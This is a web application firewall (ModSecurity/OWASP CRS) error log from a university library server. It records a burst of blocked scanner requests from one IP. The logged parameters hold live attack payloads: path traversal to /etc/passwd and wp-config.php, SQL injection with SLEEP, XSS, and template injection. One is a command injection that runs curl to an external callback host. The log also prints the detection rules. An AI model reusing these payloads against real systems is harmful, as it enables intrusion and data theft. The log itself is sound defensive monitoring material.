[Tue Aug 29 11:37:50.420308 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXA9kIAAAAO"]
[Tue Aug 29 11:37:52.404937 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAWvFN0AAAAa"]
[Tue Aug 29 11:37:59.468459 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXWLHkAAAAD"]
[Tue Aug 29 11:37:59.508207 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXVynoAAAAB"]
[Tue Aug 29 11:38:10.703313 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAW7FQsAAAAE"]
[Tue Aug 29 11:38:23.377643 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXWLMEAAAAD"]
[Tue Aug 29 11:38:33.377404 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXbb54AAAAL"]
[Tue Aug 29 11:38:34.484302 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gocf3fqdnn4cyy.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAYIYhQAAAAM"]
[Tue Aug 29 11:38:34.511844 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAW7FUkAAAAE"]
[Tue Aug 29 11:38:35.399373 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYMWHwAAAAR"]
[Tue Aug 29 11:38:46.364912 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYculUAAAAN"]
[Tue Aug 29 11:38:47.363633 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXwLJoAAAAe"]
[Tue Aug 29 11:38:47.393422 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYculkAAAAN"]
[Tue Aug 29 11:38:56.364211 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYmldcAAAAQ"]
[Tue Aug 29 11:38:57.354926 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYh9Q4AAAAK"]
[Tue Aug 29 11:38:57.360794 2023] [:error] [pid 1568] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYgzggAAAAE"]
[Tue Aug 29 11:39:05.002586 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAYMWM0AAAAR"]
[Tue Aug 29 11:39:07.078795 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYb5wMAAAAI"]
[Tue Aug 29 11:39:11.545446 2023] [:error] [pid 1685] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12b8Co-f0AAAaV1XIAAAAi"]
[Tue Aug 29 11:39:12.113381 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAYcusEAAAAN"]
[Tue Aug 29 11:39:12.122546 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAagEw0AAAAn"]
[Tue Aug 29 11:39:12.979787 2023] [:error] [pid 1672] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO12cMCo-f0AAAaIwwAAAAAH"]
[Tue Aug 29 11:39:18.666655 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAaXqroAAAAl"]
[Tue Aug 29 11:39:23.565331 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAXA9rUAAAAO"]
[Tue Aug 29 11:39:36.419534 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAV1EgcAAAAd"]
[Tue Aug 29 11:39:48.363790 2023] [:error] [pid 1803] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAcL6wEAAAAM"]
[Tue Aug 29 11:39:56.470845 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaHMeAAAAAE"]
[Tue Aug 29 11:40:02.610443 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gwusuipjdxf7ex.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcjAgYAAAAw"]
[Tue Aug 29 11:40:05.520431 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAXQKKEAAAAj"]
[Tue Aug 29 11:40:07.388809 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAYb55oAAAAI"]
[Tue Aug 29 11:40:07.390483 2023] [:error] [pid 1525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAX1n4QAAAAm"]
[Tue Aug 29 11:40:12.388915 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAaXqugAAAAl"]
[Tue Aug 29 11:40:22.551251 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcaVMYAAAAu"]
[Tue Aug 29 11:40:22.655365 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAaXqvsAAAAl"]
[Tue Aug 29 11:40:32.404342 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAYf-HEAAAAD"]
